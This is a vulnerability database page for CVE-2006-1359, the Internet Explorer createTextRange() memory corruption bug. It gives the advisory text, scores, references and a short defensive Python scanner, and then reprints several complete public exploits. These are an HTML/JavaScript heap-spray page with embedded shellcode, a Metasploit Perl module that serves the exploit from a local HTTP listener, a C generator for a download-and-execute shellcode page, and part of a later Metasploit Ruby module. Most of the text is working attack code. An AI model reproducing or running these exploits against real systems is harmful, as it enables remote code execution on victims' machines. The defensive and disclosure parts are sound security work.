CVE-2006-1359
CVSS 9.3
Published: 2006-03-22 19:06:00
Revised: 2011-03-07 21:32:52

[Original] Microsoft Internet Explorer 6 and 7 Beta 2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a certain createTextRange call on a checkbox object, which results in a dereference of an invalid table pointer.


[CNNVD] Microsoft Internet Explorer CreateTextRange Remote Code Execution Vulnerability (CNNVD-200603-375)

        Microsoft Internet Explorer is a very popular web browser released by Microsoft.
        Internet Explorer's implementation of the createTextRange() function contains a flaw that a remote attacker could exploit to execute arbitrary instructions on the client machine.
        Under certain conditions, Internet Explorer's use of createTextRange() can result in a dereference of an invalid table pointer, so that an error occurs when the referenced 32-bit address is called, as shown below:
        0x7D53C15D MOV ECX, DWORD PTR DS:[EDI]
        ..
        0x7D53C166 CALL DWORD PTR [ECX]
        Because of this dereference, ECX points to a far-away, non-existent memory location, which crashes IE and may also allow execution of arbitrary instructions.
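Added defender-side illustration, not part of this CNNVD record or of any exploit listed on the page: a small Python scanner that flags an HTML document only when a createTextRange() call occurs together with the heap-spray idiom that the public exploits for this bug share (an unescape'd %u9090 NOP sled grown by string doubling, large blocks pushed into an array in a long loop). The sample pages are constructed, and the indicator names and the two-indicator threshold are this example's own choices.

```python
import re

# Constructed sample: the heap-spray idiom shared by the public createTextRange exploits
# (unescape'd %u9090 NOP sled doubled in a loop, large string blocks pushed into an
# array, then createTextRange() on an <input>), and a benign page for comparison.
SPRAY_SAMPLE = r'''
<input type="checkbox" id="blah">
<script language="javascript">
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983");
bigblock = unescape("%u9090%u9090");
while (bigblock.length < slackspace) bigblock += bigblock;
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
memory = new Array();
for (i = 0; i < 2020; i++) memory[i] = block + shellcode;
var r = document.getElementById('blah').createTextRange();
</script>
'''

# Constructed benign page: ordinary DHTML use of createTextRange() with no spray.
BENIGN_SAMPLE = r'''
<script>
var r = document.getElementById("editor").createTextRange();
r.moveStart("character", 5);
</script>
'''

# Each indicator is a (name, regex) pair. A page is flagged only when the trigger call
# is present together with at least two spray indicators, so that legitimate
# createTextRange() callers are not reported.
SPRAY_INDICATORS = [
    # unescape() of two or more consecutive %u9090 units (0x90 0x90 = NOP NOP on x86)
    ("nop_sled_unescape", re.compile(r'unescape\(\s*["\'](?:%u9090){2,}', re.I)),
    # "x += x" or "x = x + x": exponential growth of the sled string
    ("string_doubling",   re.compile(r'(\w+)\s*\+=\s*\1\b|(\w+)\s*=\s*\2\s*\+\s*\2\b')),
    # loop bound of 0x10000 bytes or more, e.g. "< 0x40000"
    ("large_block_size",  re.compile(r'<\s*0x[0-9a-f]{5,}', re.I)),
    # for-loop with a three-digit-or-larger bound storing into an array element
    ("array_fill_loop",   re.compile(r'for\s*\(.*?<\s*\d{3,}.*?\)\s*\w+\[\w+\]\s*=', re.I | re.S)),
]
TRIGGER = re.compile(r'\.createTextRange\s*\(', re.I)


def score_page(html: str) -> dict:
    """Return the matched indicator names and a verdict for one HTML document."""
    hits = [name for name, rx in SPRAY_INDICATORS if rx.search(html)]
    trigger = bool(TRIGGER.search(html))
    return {
        "trigger": trigger,
        "indicators": hits,
        "suspicious": trigger and len(hits) >= 2,
    }


if __name__ == "__main__":
    for label, page in (("spray", SPRAY_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, score_page(page))
```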

- CVSS (base score)

CVSS score: 9.3 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: MEDIUM [exploitation requires certain access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-94 [Improper Control of Generation of Code ('Code Injection')]

- CPE (affected platforms and products)

cpe:/a:microsoft:ie:7.0:beta_2
cpe:/a:microsoft:ie:6.0:sp2
cpe:/a:microsoft:ie:6.0:sp1
cpe:/a:microsoft:ie:6.0    Microsoft Internet Explorer 6.0

- OVAL (technical details for detection)

oval:org.mitre.oval:def:985    IE6 DHTML Method Call Memory Corruption (WinXP)
oval:org.mitre.oval:def:1702    IE6 DHTML Method Call Memory Corruption (Win2K/XP,SP1)
oval:org.mitre.oval:def:1678    IE 5.01 DHTML Method Call Memory Corruption
oval:org.mitre.oval:def:1657    IE6 DHTML Method Call Memory Corruption (Server 2003,SP1)
oval:org.mitre.oval:def:1178    IE6 DHTML Method Call Memory Corruption (Server 2003)
*OVAL describes in detail how to detect this vulnerability; the related OVAL definitions give further technical details on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1359
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1359
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-375
(official data source) CNNVD

- Other links and resources

http://www.us-cert.gov/cas/techalerts/TA06-101A.html
(UNKNOWN)  CERT  TA06-101A
http://www.kb.cert.org/vuls/id/876678
(UNKNOWN)  CERT-VN  VU#876678
http://xforce.iss.net/xforce/xfdb/25379
(UNKNOWN)  XF  ie-createtextrange-command-execution(25379)
http://www.vupen.com/english/advisories/2006/1318
(UNKNOWN)  VUPEN  ADV-2006-1318
http://www.vupen.com/english/advisories/2006/1050
(UNKNOWN)  VUPEN  ADV-2006-1050
http://www.securityfocus.com/bid/17196
(UNKNOWN)  BID  17196
http://www.securityfocus.com/archive/1/archive/1/429124/30/6120/threaded
(UNKNOWN)  BUGTRAQ  20060328 Determina Fix for CVE-2006-1359 (Zero Day MS Internet Explorer Remote "CreateTextRange()" Code Execution)
http://www.securityfocus.com/archive/1/archive/1/429088/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060328 EEYE: Temporary workaround for IE createTextRange vulnerability
http://www.securityfocus.com/archive/1/archive/1/428600/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060323 Secunia Research: Microsoft Internet Explorer "createTextRange()"Code Execution
http://www.securityfocus.com/archive/1/archive/1/428583/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060322 Microsoft Internet Explorer (mshtml.dll) - Remote Code Execution
http://www.securityfocus.com/archive/1/428441
(UNKNOWN)  BUGTRAQ  20060322 IE crash
http://www.osvdb.org/24050
(UNKNOWN)  OSVDB  24050
http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx
(UNKNOWN)  MS  MS06-013
http://www.microsoft.com/technet/security/advisory/917077.mspx
(UNKNOWN)  CONFIRM  http://www.microsoft.com/technet/security/advisory/917077.mspx
http://www.computerterrorism.com/research/ct22-03-2006
(VENDOR_ADVISORY)  MISC  http://www.computerterrorism.com/research/ct22-03-2006
http://www.ciac.org/ciac/bulletins/q-154.shtml
(UNKNOWN)  CIAC  Q-154
http://securitytracker.com/id?1015812
(UNKNOWN)  SECTRACK  1015812
http://secunia.com/secunia_research/2006-7/advisory/
(UNKNOWN)  MISC  http://secunia.com/secunia_research/2006-7/advisory/
http://secunia.com/advisories/18680
(VENDOR_ADVISORY)  SECUNIA  18680
http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1662.html
(UNKNOWN)  FULLDISC  20060327 Determina Fix for the IE createTextRange() bug
http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1434.html
(UNKNOWN)  FULLDISC  20060322 FW: [Full-disclosure] IE crash
http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1430.html
(UNKNOWN)  FULLDISC  20060322 Microsoft Internet Explorer (mshtml.dll) - Remote Code Execution
http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1427.html
(UNKNOWN)  FULLDISC  20060322 IE crash

- Vulnerability information

Microsoft Internet Explorer CreateTextRange Remote Code Execution Vulnerability
High risk    Design error
2006-03-22 00:00:00 2006-03-23 00:00:00
Remote
        Microsoft Internet Explorer is a very popular web browser released by Microsoft.
        Internet Explorer's implementation of the createTextRange() function contains a flaw that a remote attacker could exploit to execute arbitrary instructions on the client machine.
        Under certain conditions, Internet Explorer's use of createTextRange() can result in a dereference of an invalid table pointer, so that an error occurs when the referenced 32-bit address is called, as shown below:
        0x7D53C15D MOV ECX, DWORD PTR DS:[EDI]
        ..
        0x7D53C166 CALL DWORD PTR [ECX]
        Because of this dereference, ECX points to a far-away, non-existent memory location, which crashes IE and may also allow execution of arbitrary instructions.

- Advisory and patch

        The vendor has released an upgrade patch to fix this security issue; patch download link:
        http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx?pf=true

- Vulnerability information (1606)

MS Internet Explorer (createTextRang) Remote Code Execution Exploit (EDBID:1606)
windows remote
2006-03-23 Verified
0 darkeagle
N/A
<!--
 -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
/\
\/	Internet Explorer Remote Code Execution Exploit v 0.1
/\		  by Darkeagle of Unl0ck Research Team
\/
/\	used SkyLined idea of exploitation. special tnx goes to him.
\/

Affected Software	:  Microsoft Internet Explorer 6.x, IE7 Beta 2
Severity		:  Critical
Impact		:  Remote System Access
Solution Status	:  ** UNPATCHED **
Discovered by 	:  Computer Terrorism (UK)
Advisory Date	:  22nd March, 2006
Tested		:  WinXP SP2 RUS IE 6.0 (full patched)

Vulnerability details:

PoC from CyberTerrorists crashes IE and overwrites EIP. EIP points to unknown place.
In my case it points to 0x3c0474c2.
Exploit fills heap with "nops+shellcode" 'til 0x3CxxXXxx. Then IE tries to read memory
@ 0x3c0474c2. At this time 0x3c0474c2 contains nops+shellcode. In the end IE executes
shellcode.

Exploit needs more RAM.
Tested under 192mb RAM with 800mb of maximum page cache.

Under 512mb code was executed after 1-1.5 minutes.

Successful exploitation will execute the standard Windows calculator.

Greets: 
		Unl0ck Researchers,
		0x557 guys,
		ph4nt0m guys,
		sh0k, uf0,
		BlackSecurity guys,
		many otherz.

/\	http://unl0ck.net
\/	
/\	(c) 2004 - 2006
\/
 -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
 -->

<input type="checkbox" id="blah">
<SCRIPT language="javascript">

shellcode = unescape(	"%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
			"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
			"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
			"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
			"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
			"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
			"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
			"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
			"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
			"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
			"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
			"%uCC4A%uD0FF");

    bigblock = unescape("%u9090%u9090"); 
    slackspace = 20 + shellcode.length

    while (bigblock.length < slackspace)
		bigblock += bigblock;

    fillblock = bigblock.substring(0, slackspace);

    block = bigblock.substring(0, bigblock.length-slackspace);

    while(block.length + slackspace < 0x40000) 
		block = block + block + fillblock;

    memory = new Array();

    for ( i = 0; i < 2020; i++ ) 
		memory[i] = block + shellcode;
  
    var r = document.getElementById('blah').createTextRange();

</script>

# milw0rm.com [2006-03-23]
		

- Vulnerability information (1620)

MS Internet Explorer (createTextRang) Remote Exploit (meta update) (EDBID:1620)
windows remote
2006-04-01 Verified
0 Randy Flood
N/A
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_createtextrange;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

my $advanced =
  {
	'Gzip'       => [1, 'Enable gzip content encoding'],
	'Chunked'    => [1, 'Enable chunked transfer encoding'],
  };

my $info =
  {
	'Name'           => 'Internet Explorer createTextRange() Code Execution',
	'Version'        => '$Revision: 1.4 $',
	'Authors'        =>
	  [
		'Faithless <rhyskidd [at] gmail.com>',
		'Darkeagle <unl0ck.net>',
		'H D Moore <hdm [at] metasploit.com>',
		'<justfriends4n0w [at] yahoo.com>',
		'Anonymous',
	  ],

	'Description'    =>
	  Pex::Text::Freeform(qq{
		This module exploits a code execution vulnerability in Microsoft Internet Explorer.
	Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory  in a way, which, under 
	certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point
	to a very remote, non-existent memory location. This module is the result of merging three
	different exploit submissions and has only been reliably tested against Windows XP SP2.
	This vulnerability was independently discovered by multiple parties. The heap spray method
	used by this exploit was pioneered by Skylined.
}),

	'Arch'           => [ 'x86' ],
	'OS'             => [ 'win32', 'winxp', 'win2003' ],
	'Priv'           => 0,

	'UserOpts'       =>
	  {
		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
	  },

	'Payload'        =>
	  {
		'Space'    => 1024,
		'BadChars' => "\x00",
		'Keys'     => ['-bind'],
	  },
	'Refs'           =>
	  [
		['OSVDB', '24050'],
		['BID', '17196'],
		['CVE', '2006-1359'],
		['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'],
		['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'],
		['URL', 'http://www.kb.cert.org/vuls/id/876678'],
		['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'],
		['URL', 'http://www.shog9.com/crashIE.html'],
	  ],

	'DefaultTarget'  => 0,
	'Targets'        =>
	  [
		[ 'Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)' ],
		[ 'Internet Explorer 6 - (6.0.3790.0) -> 746F9468 (Windows XP SP2)' ],
	  ],

	'Keys'           => [ 'ie' ],

	'DisclosureDate' => 'Mar 19 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	
	if (! $self->InitNops(128)) {
		$self->PrintLine("[*] Failed to initialize the NOP module.");
		return;
	}

	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('HTTPHOST'),
		LocalPort => $self->GetVar('HTTPPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp'
	  );
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}

	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
	  Pex::Utils::SourceIP('1.2.3.4') :
	  $self->GetVar('HTTPHOST');

	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

	while (defined($client = $server->accept())) {
		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
	}

	return;
}

sub HandleHttpClient
{
	my $self = shift;
	my $fd   = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

	# Read the HTTP command
	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
	my $agent;

	# Read in the HTTP headers
	while ((my $line = $fd->RecvLine(10))) {

		$line =~ s/^\s+|\s+$//g;

		my ($var, $val) = split(/\:/, $line, 2);

		# Break out if we reach the end of the headers
		last if (not defined($var) or not defined($val));

		$agent = $val if $var =~ /User-Agent/i;
	}

	my $os = 'Unknown';

	$os = 'Linux'     if $agent =~ /Linux/i;
	$os = 'Mac OS X'  if $agent =~ /OS X/i;
	$os = 'Windows'   if $agent =~ /Windows/i;

	$self->PrintLine("[*] Client connected from $rhost:$rport ($os).");

	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));

	$fd->Close();
}

sub JSUnescape {
	my $self = shift;
	my $data = shift;
	my $code = '';

	# Encode the shellcode via %u sequences for JS's unescape() function
	my $idx = 0;
	while ($idx < length($data) - 1) {
		my $c1 = ord(substr($data, $idx, 1));
		my $c2 = ord(substr($data, $idx+1, 1));
		$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
		$idx += 2;
	}

	return $code;
}

sub GenerateHTML {
	my $self   = shift;
	my $target = $self->Targets->[$self->GetVar('TARGET')];

	my $shellcode    = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
	my $nops         = $self->JSUnescape($self->MakeNops(4));
	my $rnd          = int(rand(3));
	my $inputtype    = (($rnd == 0) ? "checkbox" : (($rnd == 1) ? "radio" : "image"));
	my $inp          = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $tmp          = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $payload      = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $nopslide     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $slidesize    = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $fillblock    = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $memblock     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $heap         = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $index        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $maxIndex     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $fillHeap     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $start        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $timer        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	$rnd             = int(rand(2));
	my $setTimeout   =($rnd == 0) ? "setTimeout('$fillHeap()', 5);" : "";
	my $setInterval  =($rnd == 1) ? "setInterval('$fillHeap()', 5);" : "";

	my $data  = qq#
<html>
<head>
	<script language="javascript">
    var $payload=unescape("$shellcode");

    var $nopslide=unescape("$nops");
    var $slidesize=20+$payload.length;
    while ($nopslide.length<$slidesize)
    {
        $nopslide+=$nopslide;
    }    

    var $fillblock=$nopslide.substring(0,$slidesize);
    var $memblock=$nopslide.substring(0,$nopslide.length-$slidesize);

    while($memblock.length+$slidesize<0x40000)
    {
        $memblock+=$fillblock;
    }    

    var $heap=new Array();
    var $index=0;
    var $maxIndex=2020;
    
    function $fillHeap() {
      $timer.innerHTML=Math.round(($index/$maxIndex)*100);
      if ($index<$maxIndex) {
        $heap.push($memblock+$payload);
        $index++;
        $setTimeout
      }
      else {
        $timer.innerHTML=100;
        $inp=document.createElement("input");
        $inp.type="$inputtype";
        $tmp=$inp.createTextRange();        
      }
    }   
    
    function $start() {
      $setTimeout$setInterval
    }
	</script>
</head>
<body onload="$start()">
Sit back and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit.<BR />
In the meantime, you can open your task manager and watch how the VM size of IEXPLORE.EXE grows, while the CPU time of this process is very low.<BR />
Progress: <span id="$timer"></span>%
</body>
</html>
#;
}

sub BuildResponse {
	my ($self, $content) = @_;

	my $response =
	  "HTTP/1.1 200 OK\r\n" .
	  "Content-Type: text/html\r\n";

	if ($self->GetVar('Gzip')) {
		$response .= "Content-Encoding: gzip\r\n";
		$content = $self->Gzip($content);
	}
	if ($self->GetVar('Chunked')) {
		$response .= "Transfer-Encoding: chunked\r\n";
		$content = $self->Chunk($content);
	} else {
		$response .= 'Content-Length: ' . length($content) . "\r\n" .
		  "Connection: close\r\n";
	}

	$response .= "\r\n" . $content;

	return $response;
}

sub Chunk {
	my ($self, $content) = @_;

	my $chunked;
	while (length($content)) {
		my $chunk = substr($content, 0, int(rand(10) + 1), '');
		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
	}
	$chunked .= "0\r\n\r\n";

	return $chunked;
}

sub Gzip {
	my $self = shift;
	my $data = shift;
	my $comp = int(rand(5))+5;

	my($wtr, $rdr, $err);

	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
	print $wtr $data;
	close ($wtr);
	local $/;

	return (<$rdr>);
}
1;

# milw0rm.com [2006-04-01]
		

- Vulnerability information (1628)

MS Internet Explorer (createTextRang) Download Shellcoded Exploit (2) (EDBID:1628)
windows remote
2006-03-31 Verified
0 ATmaCA
N/A
/*
*
* Internet Explorer "createTextRang" Download Shellcoded Exploit (2)
* Bug discovered by Computer Terrorism (UK)
* http://www.computerterrorism.com/research/ct22-03-2006
*
* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
* Severity: Critical
* Impact: Remote System Access
* Solution Status: Unpatched
*
* E-Mail: atmaca@icqmail.com
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
* Credit to Kozan,SkyLined,delikon,Darkeagle,Stelian Ene
*
*/

/*
*
* This one is more faster than all released createTextRange exploits
* because it uses last version of SkyLined's heap spraying code,
* special 10x goes to him.
*
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* malloc, free, exit */
#include <string.h>   /* strlen, strcpy, strcat, memset */

#define BUF_LEN         0x800
#define FILE_NAME       "index.htm"

char body1[] =
	"<input type=\"checkbox\" id=\"blah\">\r\n"
	"<SCRIPT language=\"javascript\">\r\n\r\n"
	"\tvar heapSprayToAddress = 0x3c0974c2;\r\n\r\n"
	"\tvar payLoadCode = unescape(\"%u9090%u9090%u9090\" +\r\n"
	"\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n"
	"\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n"
	"\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n"
	"\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n"
	"\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n"
	"\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n"
	"\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n"
	"\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n"
	"\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n"
	"\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n"
	"\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n"
	"\t\"%u0065";

char body2[] =
	"\r\n\r\n\tvar heapBlockSize = 0x400000;\r\n\r\n"
	"\tvar payLoadSize = payLoadCode.length * 2;\r\n\r\n" 
	"\tvar spraySlideSize = heapBlockSize - (payLoadSize+0x38);\r\n\r\n"
	"\tvar spraySlide = unescape(\"%u9090%u9090\");\r\n" 
	"\tspraySlide = getSpraySlide(spraySlide,spraySlideSize);\r\n\r\n"
	"\theapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\r\n\r\n"
	"\tmemory = new Array();\r\n\r\n"
	"\tfor (i=0;i<heapBlocks;i++)\r\n" 
	"\t{\r\n\t\tmemory[i] = spraySlide + payLoadCode;\r\n\t}\r\n\r\n"
	"\tvar r = document.getElementById('blah').createTextRange();\r\n\r\n"
	"\tfunction getSpraySlide(spraySlide, spraySlideSize)\r\n" 
	"\t{\r\n\t\twhile (spraySlide.length*2<spraySlideSize)\r\n\t\t{\r\n"
	"\t\t\tspraySlide += spraySlide;\r\n\t\t}\r\n"	
	"\t\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\r\n"
	"\t\treturn spraySlide;\r\n"
	"\t}\r\n\r\n</script>";


int main(int argc,char *argv[])
{
        if (argc < 2)
        {
                printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)");
                printf("\nCoded by ATmaCA (atmaca[at]icqmail.com)\n");
                printf("\nUsage:\n");
                printf("ie_exp <WebUrl>\n");

                return 0;
        }

        FILE *File;
        char *pszBuffer;
        char *web = argv[1];
        char *pu = "%u";
        char u_t[8];            /* "%u" + four hex digits + NUL is 7 bytes; the original 5-byte buffer overflowed */
        size_t weblen = strlen(web);
        /* size the output buffer from the actual content instead of the fixed BUF_LEN */
        size_t buflen = strlen(body1) + strlen(body2) + weblen*5 + 16;
        char *utf16 = (char*)malloc(weblen*5 + 1);

        if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
                printf("\n [Err:] fopen()");
                exit(1);
        }

        pszBuffer = (char*)malloc(buflen);
        /* strcpy keeps the terminating NUL that the strcat calls below depend on */
        strcpy(pszBuffer,body1);

        memset(utf16,'\0',weblen*5 + 1);
        /* emit the URL as %uXXXX little-endian UTF-16 units; for an odd length web[i+1] is the NUL terminator */
        for (unsigned int i=0;i<weblen;i=i+2)
        {
                sprintf(u_t,"%s%.2x%.2x", pu, (unsigned char)web[i+1], (unsigned char)web[i]);
                strcat(utf16,u_t);
        }

        strcat(pszBuffer,utf16);
        strcat(pszBuffer,"%u0000\");");
        strcat(pszBuffer,body2);

        /* write only the generated text, not the uninitialised remainder of the buffer */
        fwrite(pszBuffer, strlen(pszBuffer), 1,File);
        fclose(File);
        free(utf16);
        free(pszBuffer);

        printf("\n\n"  FILE_NAME  " has been created in the current directory.\n");
        return 0;
}

// milw0rm.com [2006-03-31]
		

- Vulnerability information (16578)

Internet Explorer createTextRange() Code Execution (EDBID:16578)
windows remote
2010-09-20 Verified
0 metasploit
N/A
##
# $Id: ms06_013_createtextrange.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer createTextRange() Code Execution',
			'Description'    => %q{
					This module exploits a code execution vulnerability in Microsoft Internet Explorer.
				Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory  in a way, which, under
				certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point
				to a very remote, non-existent memory location. This module is the result of merging three
				different exploit submissions and has only been reliably tested against Windows XP SP2.
				This vulnerability was independently discovered by multiple parties. The heap spray method
				used by this exploit was pioneered by Skylined.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Faithless <rhyskidd [at] gmail.com>',
					'Darkeagle <unl0ck.net>',
					'hdm',
					'<justfriends4n0w [at] yahoo.com>',
					'anonymous',
				],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-1359'],
					['OSVDB', '24050'],
					['MSB', 'MS06-013'],
					['BID', '17196'],
					['US-CERT-VU', '876678'],
					['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'],
					['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'],
					['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'],
					['URL', 'http://www.shog9.com/crashIE.html'],
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)', { 'Ret' => 0x746F9468 } ],
					[ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ],

				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 19 2006'))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Create some nops
		nops = Rex::Text.to_unescape(make_nops(4))

		# Generate a random XML namespace for VML
		xmlns = rand_text_alpha(rand(30)+2)

		# Randomize the javascript variable names
		rnd              = rand(3)
		var_inputtype    = ((rnd == 0) ? "checkbox" : ((rnd == 1) ? "radio" : "image"))
		var_inp          = "_"+rand_text_alpha(rand(6)+3)
		var_tmp          = "_"+rand_text_alpha(rand(6)+3)
		var_payload      = "_"+rand_text_alpha(rand(6)+3)
		var_nopslide     = "_"+rand_text_alpha(rand(6)+3)
		var_slidesize    = "_"+rand_text_alpha(rand(6)+3)
		var_fillblock    = "_"+rand_text_alpha(rand(6)+3)
		var_memblock     = "_"+rand_text_alpha(rand(6)+3)
		var_heap         = "_"+rand_text_alpha(rand(6)+3)
		var_index        = "_"+rand_text_alpha(rand(6)+3)
		var_maxIndex     = "_"+rand_text_alpha(rand(6)+3)
		var_fillHeap     = "_"+rand_text_alpha(rand(6)+3)
		var_start        = "_"+rand_text_alpha(rand(6)+3)
		var_timer        = "_"+rand_text_alpha(rand(6)+3)
		rnd              = rand(2)
		var_setTimeout   = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
